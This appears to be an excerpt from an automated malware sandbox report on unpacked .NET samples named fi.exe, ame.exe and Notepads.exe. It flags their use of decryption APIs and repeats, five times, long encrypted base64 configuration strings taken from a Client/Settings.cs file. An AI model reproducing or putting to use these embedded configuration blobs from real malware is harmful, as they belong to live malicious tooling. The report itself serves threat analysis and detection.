Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

.NET source code contains long base64-encoded strings

Source: ame.exe.1.dr, Client/Settings.cs	Base64 encoded string: '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
Source: Notepads.exe.3.dr, Client/Settings.cs	Base64 encoded string: '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
Source: 3.2.ame.exe.500000.0.unpack, Client/Settings.cs	Base64 encoded string: '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
Source: 3.0.ame.exe.500000.0.unpack, Client/Settings.cs	Base64 encoded string: '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
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Settings.cs	Base64 encoded string: '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
